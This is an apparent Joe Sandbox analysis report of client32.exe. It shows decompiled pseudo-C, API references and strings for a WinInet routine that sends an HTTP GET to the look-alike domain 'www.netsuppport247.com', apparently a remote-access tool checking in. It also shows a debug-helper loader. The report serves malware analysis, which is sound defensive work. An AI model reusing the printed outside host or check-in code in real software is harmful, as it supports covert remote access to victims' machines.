Instruction Fuzzy Hash: 03C00231811038FFCF122B67FC4494D3F66EB462603254C7AE1085203086A11C61EFEB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: client32.exePID: 2808, Parent PID: 7036COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	1698
Total number of Limit Nodes:	49

Executed Functions

Function 11029BB0 Relevance: 89.8, APIs: 39, Strings: 12, Instructions: 534
libraryloadernetworkCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E11029BB0(char* _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				long _v20;
				long _v24;
				void* _v28;
				long _v32;
				CHAR* _v36;
				long _v40;
				CHAR* _v44;
				long _v48;
				CHAR* _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				long _v68;
				long _v72;
				long _v76;
				long _v80;
				long _v84;
				_Unknown_base(*)()* _v88;
				long _v92;
				long _v96;
				long _v100;
				long _v104;
				long _v108;
				long _v112;
				long _v116;
				long _v120;
				long _v128;
				long _v132;
				long _v136;
				long _v140;
				struct HINSTANCE__* _v144;
				void* __edi;
				void* __esi;
				signed int _t165;
				struct HINSTANCE__* _t168;
				CHAR* _t169;
				intOrPtr _t174;
				int _t176;
				_Unknown_base(*)()* _t180;
				struct HINSTANCE__* _t182;
				long _t191;
				_Unknown_base(*)()* _t196;
				intOrPtr _t197;
				void* _t198;
				char* _t200;
				void* _t202;
				_Unknown_base(*)()* _t205;
				_Unknown_base(*)()* _t208;
				intOrPtr _t214;
				void* _t216;
				_Unknown_base(*)()* _t218;
				_Unknown_base(*)()* _t219;
				_Unknown_base(*)()* _t224;
				_Unknown_base(*)()* _t230;
				void* _t231;
				void* _t239;
				_Unknown_base(*)()* _t242;
				_Unknown_base(*)()* _t245;
				struct HINSTANCE__* _t246;
				long _t248;
				signed int _t249;
				long _t252;
				long _t283;
				long _t285;
				struct HWND__* _t286;
				void* _t288;
				long _t290;
				char* _t292;
				long _t294;
				signed int _t295;
				signed int _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t304;
				void* _t305;

				_push(0xffffffff);
				_push(0x1117fc4b);
				_push( *[fs:0x0]);
				_t301 = _t300 - 0x80;
				_t165 =  *0x111ec774; // 0xcbc1010
				_push(_t165 ^ _t299);
				 *[fs:0x0] =  &_v16;
				_t283 = 0;
				_v48 = 0;
				_t168 = LoadLibraryA("WinInet.dll");
				_t245 = 0;
				_v144 = _t168;
				_v140 = 0;
				_v136 = 0;
				_v132 = 0;
				_v128 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v8 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v36 = 0;
				do {
					_t169 = _v36;
					if(_t169 != _t283) {
						__eflags = _t169 - 1;
						if(_t169 != 1) {
							__eflags = _t169 - 2;
							_t252 = (0 | _t169 == 0x00000002) + 3;
							__eflags = _t252;
							_v44 = _t252;
						} else {
							_v44 = _t169;
						}
					} else {
						_v44 = _t283;
					}
					_t288 = _v28;
					if(_t288 == _t283) {
						L11:
						_t289 = 0;
						_v52 = _t283;
						_v28 = _t283;
						if(_v36 != 3) {
							L21:
							if(_v100 != _t283) {
								L23:
								_v28 = InternetOpenA(0x11195264, _v44, _v52, _v28, _t283);
								L27:
								E11163AA5(_t289);
								_t301 = _t301 + 4;
								if(_v28 == _t283) {
									goto L70;
								}
								_t275 = _a4;
								_t197 = E11142E60(_a4, _t283);
								_t293 = _t197;
								_v60 = _t197;
								_v8 = 1;
								_v44 = "client.asp?chatid=0";
								_v52 = "www.netsuppport247.com";
								_t198 = E11165250(_t197, "://");
								_t304 = _t301 + 0x10;
								if(_t198 != _t283) {
									_v52 = _t198 + 3;
								}
								_t200 = E11081D30(E11081D30(_t293, 0x2e), 0x2f);
								_t305 = _t304 + 0x10;
								if(_t200 != _t283) {
									 *_t200 = 0;
									_v44 = _t200 + 1;
								}
								_t294 = _v120;
								_t246 = _v144;
								if(_v24 == _t283) {
									L37:
									if(_v116 != _t283) {
										L39:
										_t275 = _v28;
										_t202 = InternetConnectA(_v28, _v52, 0x50, _t283, _t283, 3, _t283, _t283); // executed
										_v24 = _t202;
										if(_t202 == _t283) {
											L69:
											_push(_v60);
											_v8 = 0;
											E11162777();
											_t245 = _v88;
											_t301 = _t305 + 4;
											goto L70;
										}
										if(_v20 == _t283) {
											L46:
											_t205 = _v136;
											if(_t205 != _t283) {
												L48:
												_t275 = _v24;
												_v20 =  *_t205(_v24, "GET", _v44, _t283, _t283, _t283, 0x8040f000, _t283);
												L50:
												while(_v20 != _t283) {
													_t208 = _v128;
													if(_t208 != _t283) {
														L53:
														_t295 =  *_t208(_v20, _t283, _t283, _t283, _t283);
														L55:
														_v56 = 0xffffffff;
														_v64 = 4;
														_t249 = GetLastError();
														if(_v132 != _t283) {
															L57:
															_t275 = _v20;
															_v132(_v20, 0x20000013,  &_v56,  &_v64, _t283);
															L59:
															GetLastError();
															_t214 = _v56;
															if(_t214 == 0x191 || _t214 == 0x197) {
																_t286 = GetDesktopWindow();
																if(_v108 != 0) {
																	L63:
																	asm("sbb esi, esi");
																	_t216 = _v108(_t286, _v20,  !( ~_t295) & _t249, 7, 0);
																	_t283 = 0;
																	if(_t216 != 0x2f00) {
																		break;
																	}
																	continue;
																}
																_t218 = GetProcAddress(_v144, "InternetErrorDlg");
																_v108 = _t218;
																if(_t218 == 0) {
																	SetLastError(0x78);
																	_t283 = 0;
																	break;
																}
																goto L63;
															} else {
																__eflags = _t214 - 0xc8;
																if(_t214 == 0xc8) {
																	_t275 = _v20;
																	_v32 = _v20;
																	_v20 = _t283;
																}
																break;
															}
														}
														_t275 = _v144;
														_t219 = GetProcAddress(_v144, "HttpQueryInfoA");
														_v132 = _t219;
														if(_t219 == _t283) {
															SetLastError(0x78);
															goto L59;
														}
														goto L57;
													}
													_t208 = GetProcAddress(_v144, "HttpSendRequestA");
													_v128 = _t208;
													if(_t208 == _t283) {
														SetLastError(0x78);
														_t295 = 0;
														__eflags = 0;
														goto L55;
													}
													goto L53;
												}
												__eflags = _v32 - _t283;
												if(_v32 != _t283) {
													_push(_v60);
													_v8 = 0;
													E11162777();
													_t301 = _t305 + 4;
													L73:
													__eflags = _v28 - _t283;
													if(_v28 != _t283) {
														__eflags = _v32 - _t283;
														if(_v32 != _t283) {
															_v40 = _t283;
															while(1) {
																_v20 = _t283;
																__eflags = _v92 - _t283;
																if(_v92 != _t283) {
																	goto L80;
																}
																_t196 = GetProcAddress(_v144, "InternetQueryDataAvailable");
																_v92 = _t196;
																__eflags = _t196 - _t283;
																if(_t196 == _t283) {
																	SetLastError(0x78);
																	L95:
																	_v48 = 4;
																	L97:
																	E11027F00( &_v144, _v32);
																	E11027F00( &_v144, _v24);
																	_t290 = _v48;
																	_t283 = 0;
																	__eflags = 0;
																	L98:
																	_t180 = _v120;
																	__eflags = _t180 - _t283;
																	if(_t180 != _t283) {
																		L100:
																		 *_t180(_v28);
																		L102:
																		_t182 = _v144;
																		__eflags = _t182 - _t283;
																		if(_t182 != _t283) {
																			FreeLibrary(_t182);
																		}
																		 *[fs:0x0] = _v16;
																		return _t290;
																	}
																	_t180 = GetProcAddress(_v144, "InternetCloseHandle");
																	_v120 = _t180;
																	__eflags = _t180 - _t283;
																	if(_t180 == _t283) {
																		SetLastError(0x78);
																		goto L102;
																	}
																	goto L100;
																}
																L80:
																_t176 = InternetQueryDataAvailable(_v32,  &_v20, _t283, _t283); // executed
																__eflags = _t176 - _t283;
																if(_t176 == _t283) {
																	goto L95;
																}
																_t185 = _v20;
																__eflags = _v20 - _t283;
																if(__eflags <= 0) {
																	goto L97;
																}
																_t292 = E11110230(__eflags, _t185 + 1);
																_t302 = _t301 + 4;
																_v64 = _t292;
																 *((char*)(_t292 + _v20)) = 0;
																_t285 = 0;
																_v8 = 2;
																_v44 = 0;
																_t248 = E11027EB0( &_v144, _v32, _t292, _v20,  &_v44);
																__eflags = _v40;
																if(_v40 == 0) {
																	__eflags =  *_t292 - 0xd;
																	if( *_t292 == 0xd) {
																		__eflags =  *((char*)(_t292 + 1)) - 0xa;
																		if( *((char*)(_t292 + 1)) == 0xa) {
																			_t285 = 2;
																		}
																	}
																}
																__eflags = _t248;
																if(_t248 == 0) {
																	_v48 = 5;
																}
																_t191 = _v44;
																__eflags = _t191;
																if(_t191 != 0) {
																	E110D12E0(_a8, _t285 + _t292, _t191 - _t285);
																	_t191 = _v44;
																	_t147 =  &_v40;
																	 *_t147 = _v40 + _t191 - _t285;
																	__eflags =  *_t147;
																}
																__eflags = _t248;
																if(_t248 == 0) {
																	L92:
																	_push(_t292);
																	_v8 = 0;
																	E11162777();
																	_t301 = _t302 + 4;
																	__eflags = _v20;
																	if(_v20 <= 0) {
																		goto L97;
																	}
																	_t283 = 0;
																	continue;
																} else {
																	__eflags = _t191;
																	if(_t191 == 0) {
																		_push(_t292);
																		_v8 = 0;
																		E11162777();
																		goto L97;
																	}
																	goto L92;
																}
															}
														}
														_t290 = 3;
														goto L98;
													}
													_t290 = 2;
													goto L102;
												}
												goto L69;
											}
											_t205 = GetProcAddress(_t246, "HttpOpenRequestA");
											_v136 = _t205;
											if(_t205 == _t283) {
												SetLastError(0x78);
												_v20 = _t283;
												goto L50;
											}
											goto L48;
										}
										if(_t294 != _t283) {
											L43:
											 *_t294(_v20);
											goto L46;
										}
										_t294 = GetProcAddress(_t246, "InternetCloseHandle");
										_v120 = _t294;
										if(_t294 == _t283) {
											SetLastError(0x78);
											goto L46;
										}
										goto L43;
									}
									_t224 = GetProcAddress(_t246, "InternetConnectA");
									_v116 = _t224;
									if(_t224 == _t283) {
										SetLastError(0x78);
										_v24 = _t283;
										goto L69;
									}
									goto L39;
								} else {
									if(_t294 != _t283) {
										L35:
										 *_t294(_v24);
										goto L37;
									}
									_t294 = GetProcAddress(_t246, "InternetCloseHandle");
									_v120 = _t294;
									if(_t294 == _t283) {
										SetLastError(0x78);
										goto L37;
									}
									goto L35;
								}
							}
							_t230 = GetProcAddress(_v144, "InternetOpenA");
							_v100 = _t230;
							if(_t230 == _t283) {
								SetLastError(0x78);
								_v28 = _t283;
								goto L27;
							}
							goto L23;
						}
						_v40 = 0x2000;
						_t231 = E11163A11(_t275, _t283, 0, 0x2000);
						_t301 = _t301 + 4;
						_t289 = _t231;
						if(_t245 != _t283) {
							L14:
							_push( &_v40);
							_push(_t289);
							_push(0x26);
							_push(_t283);
							if( *_t245() != _t283) {
								L17:
								if(_t245 != _t283) {
									L19:
									_push( &_v40);
									_push(_t289);
									_push(0x26);
									_push(_t283);
									if( *_t245() != _t283) {
										_t275 =  *(_t289 + 4);
										_v52 =  *(_t289 + 4);
										_v28 =  *(_t289 + 8);
									}
									goto L21;
								}
								_t245 = GetProcAddress(_v144, "InternetQueryOptionA");
								_v88 = _t245;
								if(_t245 == _t283) {
									SetLastError(0x78);
									goto L21;
								}
								goto L19;
							}
							L15:
							if(GetLastError() == 0x7a) {
								E11163AA5(_t289);
								_t275 = _v40;
								_t239 = E11163A11(_v40, _t283, _t289, _v40);
								_t301 = _t301 + 8;
								_t289 = _t239;
							}
							goto L17;
						}
						_t245 = GetProcAddress(_v144, "InternetQueryOptionA");
						_v88 = _t245;
						if(_t245 == _t283) {
							SetLastError(0x78);
							goto L15;
						}
						goto L14;
					} else {
						_t242 = _v120;
						if(_t242 != _t283) {
							L9:
							 *_t242(_t288);
							goto L11;
						}
						_t275 = _v144;
						_t242 = GetProcAddress(_v144, "InternetCloseHandle");
						_v120 = _t242;
						if(_t242 == _t283) {
							SetLastError(0x78);
							goto L11;
						}
						goto L9;
					}
					L70:
					_t174 = _v36 + 1;
					_v36 = _t174;
					__eflags = _t174 - 4;
				} while (_t174 < 4);
				goto L73;
			}

0x11029bb3
0x11029bb5
0x11029bc0
0x11029bc1
0x11029bca
0x11029bd1
0x11029bd5
0x11029bdb
0x11029be2
0x11029be5
0x11029beb
0x11029bed
0x11029bf3
0x11029bf9
0x11029bff
0x11029c02
0x11029c05
0x11029c08
0x11029c0b
0x11029c0e
0x11029c11
0x11029c14
0x11029c17
0x11029c1a
0x11029c1d
0x11029c20
0x11029c23
0x11029c26
0x11029c29
0x11029c2c
0x11029c2f
0x11029c32
0x11029c35
0x11029c38
0x11029c3b
0x11029c3e
0x11029c41
0x11029c41
0x11029c46
0x11029c4d
0x11029c50
0x11029c59
0x11029c5f
0x11029c5f
0x11029c62
0x11029c52
0x11029c52
0x11029c52
0x11029c48
0x11029c48
0x11029c48
0x11029c65
0x11029c6a
0x11029c99
0x11029c99
0x11029c9f
0x11029ca2
0x11029ca5
0x11029d4a
0x11029d4d
0x11029d68
0x11029d7d
0x11029da4
0x11029da5
0x11029daa
0x11029db0
0x00000000
0x00000000
0x11029db6
0x11029dbb
0x11029dc0
0x11029dc2
0x11029dcb
0x11029dcf
0x11029dd6
0x11029ddd
0x11029de2
0x11029de7
0x11029dec
0x11029dec
0x11029dfa
0x11029dff
0x11029e04
0x11029e06
0x11029e0a
0x11029e0a
0x11029e0d
0x11029e10
0x11029e19
0x11029e44
0x11029e49
0x11029e5e
0x11029e61
0x11029e6e
0x11029e70
0x11029e75
0x1102a017
0x1102a01a
0x1102a01b
0x1102a01f
0x1102a024
0x1102a027
0x00000000
0x1102a027
0x11029e7e
0x11029eb9
0x11029eb9
0x11029ec1
0x11029ed9
0x11029edc
0x11029ef1
0x00000000
0x11029f01
0x11029f0a
0x11029f0f
0x11029f2a
0x11029f34
0x11029f42
0x11029f42
0x11029f49
0x11029f56
0x11029f5b
0x11029f76
0x11029f76
0x11029f88
0x11029f95
0x11029f95
0x11029f9b
0x11029fa3
0x11029fb6
0x11029fb8
0x11029fd3
0x11029fda
0x11029fe5
0x11029fe8
0x11029fef
0x00000000
0x00000000
0x00000000
0x11029ff1
0x11029fc6
0x11029fcc
0x11029fd1
0x11029ff8
0x11029ffe
0x00000000
0x11029ffe
0x00000000
0x1102a002
0x1102a002
0x1102a007
0x1102a009
0x1102a00c
0x1102a00f
0x1102a00f
0x00000000
0x1102a007
0x11029fa3
0x11029f5d
0x11029f69
0x11029f6f
0x11029f74
0x11029f8f
0x00000000
0x11029f8f
0x00000000
0x11029f74
0x11029f1d
0x11029f23
0x11029f28
0x11029f3a
0x11029f40
0x11029f40
0x00000000
0x11029f40
0x00000000
0x11029f28
0x1102a012
0x1102a015
0x1102a03f
0x1102a040
0x1102a044
0x1102a049
0x1102a04c
0x1102a04c
0x1102a04f
0x1102a05b
0x1102a05e
0x1102a06a
0x1102a06d
0x1102a070
0x1102a073
0x1102a075
0x00000000
0x00000000
0x1102a083
0x1102a089
0x1102a08c
0x1102a08e
0x1102a150
0x1102a156
0x1102a156
0x1102a16c
0x1102a176
0x1102a185
0x1102a18a
0x1102a18d
0x1102a18d
0x1102a18f
0x1102a18f
0x1102a192
0x1102a194
0x1102a1af
0x1102a1b3
0x1102a1bf
0x1102a1bf
0x1102a1c5
0x1102a1c7
0x1102a1ca
0x1102a1ca
0x1102a1d5
0x1102a1e3
0x1102a1e3
0x1102a1a2
0x1102a1a8
0x1102a1ab
0x1102a1ad
0x1102a1b9
0x00000000
0x1102a1b9
0x00000000
0x1102a1ad
0x1102a094
0x1102a09e
0x1102a0a0
0x1102a0a2
0x00000000
0x00000000
0x1102a0a8
0x1102a0ab
0x1102a0ad
0x00000000
0x00000000
0x1102a0ba
0x1102a0bc
0x1102a0bf
0x1102a0c5
0x1102a0d5
0x1102a0de
0x1102a0e2
0x1102a0ea
0x1102a0ec
0x1102a0ef
0x1102a0f1
0x1102a0f4
0x1102a0f6
0x1102a0fa
0x1102a0fc
0x1102a0fc
0x1102a0fa
0x1102a0f4
0x1102a101
0x1102a103
0x1102a105
0x1102a105
0x1102a10c
0x1102a10f
0x1102a111
0x1102a11d
0x1102a122
0x1102a129
0x1102a129
0x1102a129
0x1102a129
0x1102a12c
0x1102a12e
0x1102a134
0x1102a134
0x1102a135
0x1102a139
0x1102a13e
0x1102a141
0x1102a145
0x00000000
0x00000000
0x1102a147
0x00000000
0x1102a130
0x1102a130
0x1102a132
0x1102a15f
0x1102a160
0x1102a164
0x00000000
0x1102a169
0x00000000
0x1102a132
0x1102a12e
0x1102a06d
0x1102a060
0x00000000
0x1102a060
0x1102a051
0x00000000
0x1102a051
0x00000000
0x1102a015
0x11029ec9
0x11029ecf
0x11029ed7
0x11029ef8
0x11029efe
0x00000000
0x11029efe
0x00000000
0x11029ed7
0x11029e82
0x11029e99
0x11029e9d
0x00000000
0x11029e9d
0x11029e90
0x11029e92
0x11029e97
0x11029eb3
0x00000000
0x11029eb3
0x00000000
0x11029e97
0x11029e51
0x11029e57
0x11029e5c
0x11029ea3
0x11029ea9
0x00000000
0x11029ea9
0x00000000
0x11029e1b
0x11029e1d
0x11029e34
0x11029e38
0x00000000
0x11029e38
0x11029e2b
0x11029e2d
0x11029e32
0x11029e3e
0x00000000
0x11029e3e
0x00000000
0x11029e32
0x11029e19
0x11029d5b
0x11029d61
0x11029d66
0x11029d9b
0x11029da1
0x00000000
0x11029da1
0x00000000
0x11029d66
0x11029cb0
0x11029cb7
0x11029cbc
0x11029cbf
0x11029cc3
0x11029ce4
0x11029ce7
0x11029ce8
0x11029ce9
0x11029ceb
0x11029cf0
0x11029d11
0x11029d13
0x11029d30
0x11029d33
0x11029d34
0x11029d35
0x11029d37
0x11029d3c
0x11029d3e
0x11029d44
0x11029d47
0x11029d47
0x00000000
0x11029d3c
0x11029d27
0x11029d29
0x11029d2e
0x11029d91
0x00000000
0x11029d91
0x00000000
0x11029d2e
0x11029cf2
0x11029cfb
0x11029cfe
0x11029d03
0x11029d07
0x11029d0c
0x11029d0f
0x11029d0f
0x00000000
0x11029cfb
0x11029cd7
0x11029cd9
0x11029cde
0x11029d84
0x00000000
0x11029d84
0x00000000
0x11029c6c
0x11029c6c
0x11029c71
0x11029c8c
0x11029c8d
0x00000000
0x11029c8d
0x11029c73
0x11029c7f
0x11029c85
0x11029c8a
0x11029c93
0x00000000
0x11029c93
0x00000000
0x11029c8a
0x1102a02a
0x1102a02d
0x1102a02e
0x1102a031
0x1102a031
0x00000000

APIs

LoadLibraryA.KERNEL32(WinInet.dll,0CBC1010,7476EA30,?,00000000), ref: 11029BE5
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
SetLastError.KERNEL32(00000078), ref: 11029C93
_malloc.LIBCMT ref: 11029CB7
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
GetLastError.KERNEL32 ref: 11029CF2
_free.LIBCMT ref: 11029CFE
_malloc.LIBCMT ref: 11029D07
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
SetLastError.KERNEL32(00000078), ref: 11029D84
SetLastError.KERNEL32(00000078), ref: 11029D91
SetLastError.KERNEL32(00000078), ref: 11029D9B
_free.LIBCMT ref: 11029DA5

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
SetLastError.KERNEL32(00000078), ref: 11029E3E
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
SetLastError.KERNEL32(00000078), ref: 11029EA3
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
InternetQueryDataAvailable.WININET(1117FC4B,1102CCC1,00000000,00000000), ref: 1102A09E
SetLastError.KERNEL32(00000078), ref: 1102A150
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
SetLastError.KERNEL32(00000078), ref: 1102A1B9
FreeLibrary.KERNEL32(?), ref: 1102A1CA

Strings

InternetCloseHandle, xrefs: 11029C79, 11029E1F, 11029E84, 1102A19C
WinInet.dll, xrefs: 11029BDD
://, xrefs: 11029DC5
HttpOpenRequestA, xrefs: 11029EC3
InternetOpenA, xrefs: 11029D55
HttpSendRequestA, xrefs: 11029F17
HttpQueryInfoA, xrefs: 11029F63
GET, xrefs: 11029EE9
InternetQueryDataAvailable, xrefs: 1102A07D
InternetConnectA, xrefs: 11029E4B
InternetErrorDlg, xrefs: 11029FC0
InternetQueryOptionA, xrefs: 11029CCB, 11029D1B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Internet$FreeLibrary_free_malloc$AvailableConnectDataHeapLoadOpenQuery
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 3929731738-913974648
Opcode ID: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
Opcode Fuzzy Hash: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60

Uniqueness

Uniqueness Score: -1.00%

Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E11144140(intOrPtr* __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v268;
				CHAR* _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				struct HINSTANCE__* _t38;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t53;
				struct HINSTANCE__* _t56;
				void* _t58;
				struct HINSTANCE__* _t60;
				void* _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				char _t70;
				CHAR* _t71;
				struct HINSTANCE__* _t72;
				intOrPtr* _t73;
				signed int _t74;

				_t69 = __edx;
				_t34 =  *0x111ec774; // 0xcbc1010
				_v8 = _t34 ^ _t74;
				_t73 = __ecx;
				 *__ecx = 0x111bd22c;
				 *(__ecx + 0x20) = 0;
				if(GetModuleFileNameA(0,  &_v268, 0x104) == 0) {
					L3:
					_t71 = _v272;
					L4:
					if( *(_t73 + 0x20) == 0) {
						_t71 = "DBGHELP.DLL";
						_t56 = LoadLibraryA(_t71); // executed
						 *(_t73 + 0x20) = _t56;
						if(_t56 == 0) {
							_t71 = "IMAGEHLP.DLL";
							 *(_t73 + 0x20) = LoadLibraryA(_t71);
						}
					}
					_t38 = GetModuleHandleA(_t71);
					_t62 = GetProcAddress;
					_t72 = _t38;
					_t39 = GetProcAddress(_t72, "SymGetLineFromAddr");
					 *(_t73 + 8) = _t39;
					if(_t39 != 0) {
						 *((intOrPtr*)(_t73 + 0xc)) = GetProcAddress(_t72, "SymGetLineFromName");
						 *((intOrPtr*)(_t73 + 0x10)) = GetProcAddress(_t72, "SymGetLineNext");
						 *((intOrPtr*)(_t73 + 0x14)) = GetProcAddress(_t72, "SymGetLinePrev");
						 *((intOrPtr*)(_t73 + 0x18)) = GetProcAddress(_t72, "SymMatchFileName");
					} else {
						 *((intOrPtr*)(_t73 + 0xc)) = 0;
						 *((intOrPtr*)(_t73 + 0x10)) = 0;
						 *((intOrPtr*)(_t73 + 0x14)) = 0;
						 *((intOrPtr*)(_t73 + 0x18)) = 0;
					}
					 *((intOrPtr*)(_t73 + 0x24)) = GetProcAddress(_t72, "StackWalk");
					 *((intOrPtr*)(_t73 + 0x2c)) = GetProcAddress(_t72, "SymCleanup");
					 *((intOrPtr*)(_t73 + 0x38)) = GetProcAddress(_t72, "SymLoadModule");
					 *((intOrPtr*)(_t73 + 0x28)) = GetProcAddress(_t72, "SymInitialize");
					 *((intOrPtr*)(_t73 + 0x34)) = GetProcAddress(_t72, "SymGetOptions");
					 *((intOrPtr*)(_t73 + 0x30)) = GetProcAddress(_t72, "SymSetOptions");
					 *((intOrPtr*)(_t73 + 0x3c)) = GetProcAddress(_t72, "SymGetModuleInfo");
					 *((intOrPtr*)(_t73 + 0x40)) = GetProcAddress(_t72, "SymGetSymFromAddr");
					 *((intOrPtr*)(_t73 + 0x44)) = GetProcAddress(_t72, "SymFunctionTableAccess");
					_t53 = GetProcAddress(_t72, "MiniDumpWriteDump"); // executed
					 *(_t73 + 0x1c) = _t53;
					return E11162BB7(_t73, _t62, _v8 ^ _t74, _t69, _t72, _t73);
				}
				_t58 = E11081E00( &_v268,  &_v268, 0x5c);
				if(_t58 == 0) {
					goto L3;
				}
				_t70 = "dbghelp.dll"; // 0x68676264
				 *(_t58 + 1) = _t70;
				_t68 = M111BD220; // 0x2e706c65
				 *((intOrPtr*)(_t58 + 5)) = _t68;
				_t69 =  *0x111bd224; // 0x6c6c64
				 *((intOrPtr*)(_t58 + 9)) = _t69;
				_t71 =  &_v268;
				_t60 = LoadLibraryA(_t71); // executed
				 *(_t73 + 0x20) = _t60;
				goto L4;
			}

0x11144140
0x11144149
0x11144150
0x11144161
0x11144166
0x1114416c
0x11144181
0x111441c3
0x111441c3
0x111441c9
0x111441cd
0x111441cf
0x111441d5
0x111441d7
0x111441dc
0x111441de
0x111441e6
0x111441e6
0x111441dc
0x111441ea
0x111441f0
0x111441f6
0x111441fe
0x11144202
0x11144207
0x11144225
0x11144230
0x1114423b
0x11144240
0x11144209
0x11144209
0x1114420c
0x1114420f
0x11144212
0x11144212
0x11144251
0x1114425c
0x11144267
0x11144272
0x1114427d
0x11144288
0x11144293
0x1114429e
0x111442a9
0x111442ac
0x111442b1
0x111442c3
0x111442c3
0x1114418c
0x11144196
0x00000000
0x00000000
0x11144198
0x1114419e
0x111441a1
0x111441a7
0x111441aa
0x111441b0
0x111441b3
0x111441bc
0x111441be
0x00000000

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,7476EA30), ref: 11144173
LoadLibraryA.KERNEL32(?), ref: 111441BC
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
GetModuleHandleA.KERNEL32(?), ref: 111441EA
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Strings

MiniDumpWriteDump, xrefs: 111442A3
